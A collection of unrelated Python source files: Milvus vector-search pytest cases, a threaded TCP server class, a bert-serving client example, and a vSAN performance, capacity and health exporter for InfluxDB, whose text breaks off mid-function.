search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP",
search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert check_id_result(res[0], ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params are correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
        expected: the length of the result is top_k; searching the collection with the partition tag returns empty
"""
top_k = get_top_k
nq = get_nq
metric_type = "IP"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type=metric_type,
search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
res = connect.search(collection, **query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
"""
target: test basic search function, all the search params are correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = 2
metric_type = "IP"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP",
search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
res = connect.search(collection, **query, partition_names=["new_tag"])
assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
# TODO:
# assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_without_connect(self, dis_connect, collection):
"""
target: test search vectors without connection
        method: use a disconnected instance, call the search method and check that it fails
expected: raise exception
"""
with pytest.raises(Exception) as e:
res = dis_connect.search(collection, **default_query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_not_existed(self, connect):
"""
target: search collection not existed
method: search with the random collection_name, which is not in db
expected: status not ok
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
res = connect.search(collection_name, **default_query)
@pytest.mark.tags(CaseLabel.L0)
def test_search_distance_l2(self, connect, collection):
"""
target: search collection, and check the result: distance
        method: compare the returned distance with the value computed with the Euclidean (L2) metric
        expected: the returned distance equals the computed value
"""
nq = 2
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_query, inside_vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = l2(vecs[0], inside_vecs[0])
distance_1 = l2(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, **query)
assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
"""
target: search collection, and check the result: distance
        method: compare the returned distance with the value computed with the L2 metric after building an index
        expected: the returned distance equals the computed value
"""
index_type = get_simple_index["index_type"]
nq = 2
entities, ids = init_data(connect, id_collection, auto_id=False)
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_vecs = entities[-1]["values"]
min_distance = 1.0
min_id = None
for i in range(default_nb):
tmp_dis = l2(vecs[0], inside_vecs[i])
if min_distance > tmp_dis:
min_distance = tmp_dis
min_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, **query)
tmp_epsilon = epsilon
check_id_result(res[0], min_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip(self, connect, collection):
"""
target: search collection, and check the result: distance
        method: compare the returned distance with the value computed with the inner product
        expected: the returned distance equals the computed value
"""
nq = 2
metirc_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_query, inside_vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, **query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
"""
target: search collection, and check the result: distance
        method: compare the returned distance with the value computed with the inner product after building an index
        expected: the returned distance equals the computed value
"""
index_type = get_simple_index["index_type"]
nq = 2
metirc_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metirc_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(default_nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, **query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.L0)
def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
        method: compare the returned distance with the value computed with the Jaccard metric
        expected: the returned distance equals the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities,
default_top_k, nq, metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self, connect, binary_collection):
"""
        target: search binary_collection with an unsupported metric type
        method: search the binary collection with the L2 metric type
        expected: raise an exception
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="L2")
with pytest.raises(Exception) as e:
connect.search(binary_collection, **query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_hamming_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
        method: compare the returned distance with the value computed with the Hamming metric
        expected: the returned distance equals the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = hamming(query_int_vectors[0], int_vectors[0])
distance_1 = hamming(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities,
default_top_k, nq, metric_type="HAMMING")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_substructure_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: search with new random binary entities and SUBSTRUCTURE metric type
        expected: the search returns an empty result
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = substructure(query_int_vectors[0], int_vectors[0])
distance_1 = substructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUBSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
        method: search with query entities generated as sub-vectors of the inserted entities
        expected: each query matches its source entity with a distance close to zero
"""
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
query, vecs = gen_search_vectors_params(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert res[0][0].distance <= epsilon
assert res[0][0].id == ids[0]
assert res[1][0].distance <= epsilon
assert res[1][0].id == ids[1]
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
        method: search with new random binary entities and SUPERSTRUCTURE metric type
        expected: the search returns an empty result
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUPERSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
        method: search with query entities generated as super-vectors of the inserted entities
        expected: each query matches the inserted entities with a distance close to zero
"""
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
query, vecs = gen_search_vectors_params(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 2
assert len(res[1]) == 2
assert res[0][0].id in ids
assert res[0][0].distance <= epsilon
assert res[1][0].id in ids
assert res[1][0].distance <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
        method: compare the returned distance with the value computed with the Tanimoto metric
        expected: the returned distance equals the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities,
default_top_k, nq, metric_type="TANIMOTO")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads_single_connection(self, connect, args):
"""
        target: test concurrent search with multiple threads over a single connection
        method: search with 4 threads, all sharing the same connection
expected: status ok and the returned vectors should be query_records
"""
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, **default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, connect, args):
"""
target: test search multi collections of L2
method: add vectors into 10 collections, and search
        expected: search status ok; each result has the expected length
"""
num = 10
top_k = 10
nq = 20
collection_names = []
for i in range(num):
collection = gen_unique_str(uid + str(i))
connect.create_collection(collection, default_fields)
collection_names.append(collection)
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
            search_param = get_search_param("FLAT")
            query, vecs = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
for i in range(nq):
assert check_id_result(res[i], ids[i])
assert res[i]._distances[0] < epsilon
assert res[i]._distances[1] > epsilon
for i in range(num):
connect.drop_collection(collection_names[i])
class TestSearchDSL(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_query_vector_only(self, connect, collection):
"""
target: test search normal scenario
method: search vector only
        expected: search status ok; the result length equals the default top_k
"""
init_data(connect, collection)
connect.load_collection(collection)
res = connect.search(collection, **default_query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L0)
def test_query_empty(self, connect, collection):
"""
        target: test search with an empty query dict
        method: search with empty query
expected: error raised
"""
query = {}
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
|
TcpServer.py
|
from socketserver import ThreadingTCPServer
from .message import TcpMessage
from .message import TcpRequest
from ._RequestHandler import _RequestHandler
from threading import Thread, Lock
from typing import Callable, List
class TcpServer(ThreadingTCPServer):
"""
A threaded TCP server that listens for :class:`TcpRequests <.TcpRequest>`
and returns :class:`TcpMessages <.TcpMessage>` based on user-defined request
handlers
"""
#: See :py:attr:`socketserver.BaseServer.allow_reuse_address`.
allow_reuse_address = True
#: Number of seconds to wait for a client to send data before closing
#: the connection
_TIMEOUT = 3
_LISTENER_TYPE = Callable[[TcpRequest, TcpMessage], bool]
def __init__(self, port, address="0.0.0.0", timeout=_TIMEOUT):
"""
:param port: The port to listen on
:param address: The ip address to listen on
:param timeout: Seconds to wait for an existing client
to send a request before closing the connection
:type port: int
:type address: str
:type timeout: int
"""
super().__init__((address, port), _RequestHandler)
self._main_thread = None
self._client_timeout = timeout
self._request_handlers = list()
self._thread_lock = Lock()
self._is_running = False
def get_timeout(self) -> int:
"""
:return: The configured session timeout
:rtype: int
"""
return self._client_timeout
def is_running(self) -> bool:
"""
        :return: Whether the server is currently running (True after start(), False after stop())
:rtype: bool
"""
return self._is_running
def start(self):
"""
Starts the server in a background thread
"""
self._is_running = True
self._main_thread = Thread(target=self.serve_forever, daemon=False)
self._main_thread.start()
def stop(self):
"""
Stops the server's background thread
"""
with self._thread_lock:
self._is_running = False
self.shutdown()
self._main_thread.join()
def wait(self):
"""
Waits for the server to stop. Can be used to bring the server's main
background thread to the foreground.
"""
try:
self._main_thread.join()
except KeyboardInterrupt:
self.stop()
def add_request_handler(self, listener: _LISTENER_TYPE):
"""
Adds a request handler to the server. Request handlers will be called
in order and passed (request: TcpRequest, response: TcpMessage).
After all request handlers have been called, the response is sent to
the client.
:param listener: A request handler function that manipulates an incoming
request/response pair
:type listener: Callable[[TcpRequest, TcpMessage], bool]
.. code-block:: python3
def no_op(tcp_req_obj, tcp_msg_obj):
assert isinstance(tcp_req_obj, TcpRequest)
assert isinstance(tcp_msg_obj, TcpMessage)
return True
"""
self._request_handlers.append(listener)
def get_request_handlers(self) -> List[_LISTENER_TYPE]:
"""
:return: The list of request handlers for this server
        :rtype: List[Callable[[TcpRequest, TcpMessage], bool]]
"""
return self._request_handlers
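A minimal usage sketch for the class above, assuming the package is importable (the tcp_lib module name, the port, and the handler body are placeholders, not part of this file):

from tcp_lib import TcpServer    # placeholder import path

def log_request(request, response):
    # Handlers receive (TcpRequest, TcpMessage); this one just logs, like the docstring example.
    print("received request:", request)
    return True

server = TcpServer(port=8080)
server.add_request_handler(log_request)
server.start()                   # serve_forever() runs in a background thread
try:
    server.wait()                # blocks until Ctrl-C, which calls stop()
finally:
    if server.is_running():
        server.stop()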
|
example3.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Han Xiao <artex.xh@gmail.com> <https://hanxiao.github.io>
# NOTE: First install bert-as-service via
# $
# $ pip install bert-serving-server
# $ pip install bert-serving-client
# $
# using BertClient in multicast way
import sys
import threading
from model_serving.client import bert_client
def client_clone(id, idx):
bc = bert_client(port=int(sys.argv[1]), port_out=int(sys.argv[2]), identity=id)
for j in bc.fetch():
print('clone-client-%d: received %d x %d' % (idx, j.shape[0], j.shape[1]))
if __name__ == '__main__':
bc = bert_client(port=int(sys.argv[1]), port_out=int(sys.argv[2]))
# start two cloned clients sharing the same identity as bc
for j in range(2):
t = threading.Thread(target=client_clone, args=(bc.identity, j))
t.start()
with open('README.md') as fp:
data = [v for v in fp if v.strip()]
for _ in range(3):
vec = bc.encode(data)
print('bc received %d x %d' % (vec.shape[0], vec.shape[1]))
|
vsanmetrics.py
|
#!/usr/bin/env python
# Erwan Quelin - erwan.quelin@gmail.com
from pyVim.connect import SmartConnect, Disconnect
from pyVmomi import VmomiSupport, SoapStubAdapter, vim, vmodl
import threading
import argparse
import atexit
import getpass
from datetime import datetime, timedelta
import time
import ssl
import pickle
import os
import vsanapiutils
import vsanmgmtObjects
def get_args():
parser = argparse.ArgumentParser(
description='Export vSAN cluster performance and storage usage statistics to InfluxDB line protocol')
parser.add_argument('-s', '--vcenter',
required=True,
action='store',
help='Remote vcenter to connect to')
parser.add_argument('-o', '--port',
type=int,
default=443,
action='store',
help='Port to connect on')
parser.add_argument('-u', '--user',
required=True,
action='store',
help='User name to use when connecting to vcenter')
parser.add_argument('-p', '--password',
required=False,
action='store',
help='Password to use when connecting to vcenter')
parser.add_argument('-c', '--cluster_name',
dest='clusterName',
required=True,
help='Cluster Name')
parser.add_argument("--performance",
help="Output performance metrics",
action="store_true")
parser.add_argument("--capacity",
help="Output storage usage metrics",
action="store_true")
parser.add_argument("--health",
help="Output cluster health status",
action="store_true")
parser.add_argument('--skipentitytypes',
required=False,
action='store',
help='List of entity types to skip. Separated by a comma')
parser.add_argument('--cachefolder',
default='.',
required=False,
action='store',
help='Folder where the cache files are stored')
parser.add_argument('--cacheTTL',
type=int,
default=60,
required=False,
action='store',
help='TTL of the object inventory cache')
args = parser.parse_args()
if not args.password:
args.password = getpass.getpass(
prompt='Enter password for host %s and user %s: ' %
(args.vcenter, args.user))
if not args.performance and args.skipentitytypes:
print("You can't skip a performance entity type if you don't provide the --performance tag")
exit()
if not args.performance and not args.capacity and not args.health:
print('Please provide tag(s) --performance and/or --capacity and/or --health to specify what type of data you want to collect')
exit()
return args
def connectvCenter(args):
# Don't check for valid certificate
context = ssl._create_unverified_context()
# Connect to vCenter
try:
si = SmartConnect(host=args.vcenter,
user=args.user,
pwd=args.password,
port=int(args.port),
sslContext=context)
if not si:
raise Exception("Could not connect to the specified host using specified username and password")
except vmodl.MethodFault as e:
raise Exception("Caught vmodl fault : " + e.msg)
except Exception as e:
raise Exception("Caught exception : " + str(e))
    # Get content information
content = si.RetrieveContent()
# Get Info about cluster
cluster_obj = getClusterInstance(args.clusterName, content)
# Exit if the cluster provided in the arguments is not available
if not cluster_obj:
raise Exception('Inventory exception: Did not find the required cluster')
    # Disconnect from vCenter at exit
atexit.register(Disconnect, si)
apiVersion = vsanapiutils.GetLatestVmodlVersion(args.vcenter)
vcMos = vsanapiutils.GetVsanVcMos(si._stub, context=context, version=apiVersion)
vsanClusterConfigSystem = vcMos['vsan-cluster-config-system']
try:
clusterConfig = vsanClusterConfigSystem.VsanClusterGetConfig(
cluster=cluster_obj
)
    except vmodl.fault.InvalidState as e:
        raise Exception("InvalidState exception: " + e.msg)
    except vmodl.fault.RuntimeFault as e:
        raise Exception("RuntimeFault exception: " + e.msg)
if not clusterConfig.enabled:
raise Exception("Configuration exeption: vSAN is not enabled on cluster " + args.clusterName)
return si, content, cluster_obj, vcMos
# Get cluster information
def getClusterInstance(clusterName, content):
container = content.rootFolder
viewType = [vim.ClusterComputeResource]
recursive = True
containerView = content.viewManager.CreateContainerView(container, viewType, recursive)
clusters = containerView.view
nbClusterWithSameName = 0
for cluster in clusters:
if cluster.name == clusterName:
nbClusterWithSameName += 1
cluster_obj = cluster
if nbClusterWithSameName == 1:
return cluster_obj
if nbClusterWithSameName > 1:
raise Exception("There is more than one cluster with the name " + clusterName)
return None
def getInformations(witnessHosts, cluster, si):
uuid = {}
hostnames = {}
disks = {}
    # Get host and disk information
for host in cluster.host:
# Get relationship between host id and hostname
hostnames[host.summary.host] = host.summary.config.name
        # Get all disks (cache and capacity) attached to hosts in the cluster
diskAll = host.configManager.vsanSystem.QueryDisksForVsan()
for disk in diskAll:
if disk.state == 'inUse':
uuid[disk.vsanUuid] = disk.disk.canonicalName
disks[disk.vsanUuid] = host.summary.config.name
for vsanHostConfig in cluster.configurationEx.vsanHostConfig:
uuid[vsanHostConfig.clusterInfo.nodeUuid] = hostnames[vsanHostConfig.hostSystem]
    # Get witness disk information
for witnessHost in witnessHosts:
host = (vim.HostSystem(witnessHost.host._moId, si._stub))
uuid[witnessHost.nodeUuid] = host.name
diskWitness = host.configManager.vsanSystem.QueryDisksForVsan()
for disk in diskWitness:
if disk.state == 'inUse':
uuid[disk.vsanUuid] = disk.disk.canonicalName
disks[disk.vsanUuid] = host.name
return uuid, disks
# Get all VMs managed by the hosts in the cluster; return a dict mapping VM instance UUIDs to names
# Source: https://github.com/vmware/pyvmomi-community-samples/blob/master/samples/getvmsbycluster.py
def getVMs(cluster):
vms = {}
for host in cluster.host: # Iterate through Hosts in the Cluster
for vm in host.vm: # Iterate through each VM on the host
vmname = vm.summary.config.name
# Check for white space in VM's name, and replace with escape characters
vmname = "\ ".join(vmname.split())
vms[vm.summary.config.instanceUuid] = vmname
return vms
# Output data in the Influx Line protocol format
def printInfluxLineProtocol(measurement, tags, fields, timestamp):
result = "%s,%s %s %i" % (measurement, arrayToString(tags), arrayToString(fields), timestamp)
print(result)
# Output data in the Influx Line protocol format
def formatInfluxLineProtocol(measurement, tags, fields, timestamp):
result = "%s,%s %s %i \n" % (measurement, arrayToString(tags), arrayToString(fields), timestamp)
return result
# Convert time in string format to epoch timestamp (nanosecond)
def convertStrToTimestamp(str):
sec = time.mktime(datetime.strptime(str, "%Y-%m-%d %H:%M:%S").timetuple())
ns = int(sec * 1000000000)
return ns
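A quick, standalone check of the conversion above (meant to be run alongside this helper, e.g. in a REPL); the sample time string is arbitrary and the exact epoch value depends on the local timezone, because time.mktime treats the parsed time as local.

ns = convertStrToTimestamp("2021-01-01 00:00:00")
print(ns)                      # e.g. 1609459200000000000 on a UTC host
assert ns % 1000000000 == 0    # whole seconds expressed as nanoseconds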
# Parse an entityRefId and convert it to tags
def parseEntityRefId(measurement, entityRefId, uuid, vms, disks):
tags = {}
if measurement == 'vscsi':
entityRefId = entityRefId.split("|")
split = entityRefId[0].split(":")
tags['uuid'] = split[1]
tags['vscsi'] = entityRefId[1]
tags['vmname'] = vms[split[1]]
else:
entityRefId = entityRefId.split(":")
if measurement == 'cluster-domclient':
tags['uuid'] = entityRefId[1]
if measurement == 'cluster-domcompmgr':
tags['uuid'] = entityRefId[1]
if measurement == 'host-domclient':
tags['uuid'] = entityRefId[1]
tags['hostname'] = uuid[entityRefId[1]]
if measurement == 'host-domcompmgr':
tags['uuid'] = entityRefId[1]
tags['hostname'] = uuid[entityRefId[1]]
if measurement == 'cache-disk':
tags['uuid'] = entityRefId[1]
tags['naa'] = uuid[entityRefId[1]]
tags['hostname'] = disks[entityRefId[1]]
if measurement == 'capacity-disk':
tags['uuid'] = entityRefId[1]
tags['naa'] = uuid[entityRefId[1]]
tags['hostname'] = disks[entityRefId[1]]
if measurement == 'disk-group':
tags['uuid'] = entityRefId[1]
tags['hostname'] = disks[entityRefId[1]]
if measurement == 'virtual-machine':
tags['uuid'] = entityRefId[1]
tags['vmname'] = vms[entityRefId[1]]
if measurement == 'virtual-disk':
split = entityRefId[1].split("/")
tags['uuid'] = split[0]
tags['disk'] = split[1].replace(" ", "\ ")
if measurement == 'vsan-vnic-net':
split = entityRefId[1].split("|")
tags['uuid'] = split[0]
tags['hostname'] = uuid[split[0]]
tags['stack'] = split[1]
tags['vmk'] = split[2]
if measurement == 'vsan-host-net':
tags['uuid'] = entityRefId[1]
tags['hostname'] = uuid[entityRefId[1]]
if measurement == 'vsan-pnic-net':
split = entityRefId[1].split("|")
tags['uuid'] = split[0]
tags['hostname'] = uuid[split[0]]
tags['vmnic'] = split[1]
if measurement == 'vsan-iscsi-host':
tags['uuid'] = entityRefId[1]
tags['hostname'] = uuid[entityRefId[1]]
if measurement == 'vsan-iscsi-target':
tags['target'] = entityRefId[1]
if measurement == 'vsan-iscsi-lun':
split = entityRefId[1].split("|")
tags['target'] = split[0]
tags['lunid'] = split[1]
return tags
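To make the entityRefId formats handled above concrete, here is a small standalone illustration of the two string shapes the parser deals with; the UUIDs and labels are invented and no VSAN API call is involved.

# A "<type>:<uuid>|<suffix>" style id, as handled for the vscsi measurement:
ref_with_suffix = "vscsi:502f1234-aaaa-bbbb-cccc-111122223333|scsi0:0"
prefix, suffix = ref_with_suffix.split("|")
entity_uuid = prefix.split(":")[1]     # -> "502f1234-aaaa-bbbb-cccc-111122223333"

# A plain "<type>:<uuid>" style id, as handled for hosts, disks and disk groups:
plain_ref = "cache-disk:52abcd00-0000-0000-0000-000000000001"
disk_uuid = plain_ref.split(":")[1]    # looked up in the uuid/disks dicts for naa and hostname

print(entity_uuid, suffix, disk_uuid)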
# Convert array to a string compatible with influxdb line protocol tags or fields
def arrayToString(data):
i = 0
result = ""
for key, val in data.items():
if i == 0:
result = "%s=%s" % (key, val)
else:
result = result + ",%s=%s" % (key, val)
i = i + 1
return result
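Putting the helpers together, this is roughly what one emitted record looks like for made-up tags and fields (the measurement name, tag values and metrics are placeholders); it is meant to be run next to the functions above, not as part of the script's normal flow.

example_tags = {"vcenter": "vcenter01", "cluster": "vsan-cluster"}
example_fields = {"iopsRead": 120.0, "iopsWrite": 45.0}
example_ts = 1609459200000000000    # nanosecond epoch, as produced by convertStrToTimestamp()

line = formatInfluxLineProtocol("host-domclient", example_tags, example_fields, example_ts)
print(line)
# -> "host-domclient,vcenter=vcenter01,cluster=vsan-cluster iopsRead=120.0,iopsWrite=45.0 1609459200000000000 \n"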
def parseVsanObjectSpaceSummary(data):
fields = {}
fields['overheadB'] = data.overheadB
fields['overReservedB'] = data.overReservedB
fields['physicalUsedB'] = data.physicalUsedB
fields['primaryCapacityB'] = data.primaryCapacityB
fields['reservedCapacityB'] = data.reservedCapacityB
fields['temporaryOverheadB'] = data.temporaryOverheadB
fields['usedB'] = data.usedB
if data.provisionCapacityB:
fields['provisionCapacityB'] = data.provisionCapacityB
return fields
def parseVimVsanDataEfficiencyCapacityState(data):
fields = {}
fields['dedupMetadataSize'] = data.dedupMetadataSize
fields['logicalCapacity'] = data.logicalCapacity
fields['logicalCapacityUsed'] = data.logicalCapacityUsed
fields['physicalCapacity'] = data.physicalCapacity
fields['physicalCapacityUsed'] = data.physicalCapacityUsed
fields['ratio'] = float(data.logicalCapacityUsed) / float(data.physicalCapacityUsed)
return fields
def parseCapacity(scope, data, tagsbase, timestamp):
tags = {}
fields = {}
tags['scope'] = scope
tags.update(tagsbase)
measurement = 'capacity_' + scope
if scope == 'global':
fields['freeCapacityB'] = data.freeCapacityB
fields['totalCapacityB'] = data.totalCapacityB
elif scope == 'summary':
fields = parseVsanObjectSpaceSummary(data.spaceOverview)
elif scope == 'efficientcapacity':
fields = parseVimVsanDataEfficiencyCapacityState(data.efficientCapacity)
else:
fields = parseVsanObjectSpaceSummary(data)
printInfluxLineProtocol(measurement, tags, fields, timestamp)
def parseHealth(test, value, tagsbase, timestamp):
measurement = 'health_' + test
tags = tagsbase
fields = {}
if value == 'green':
fields['health'] = 0
if value == 'yellow':
fields['health'] = 1
if value == 'red':
fields['health'] = 2
fields['value'] = '\"' + value + '\"'
printInfluxLineProtocol(measurement, tags, fields, timestamp)
def getCapacity(args, tagsbase, cluster_obj, vcMos, uuid, disks, vms):
vsanSpaceReportSystem = vcMos['vsan-cluster-space-report-system']
try:
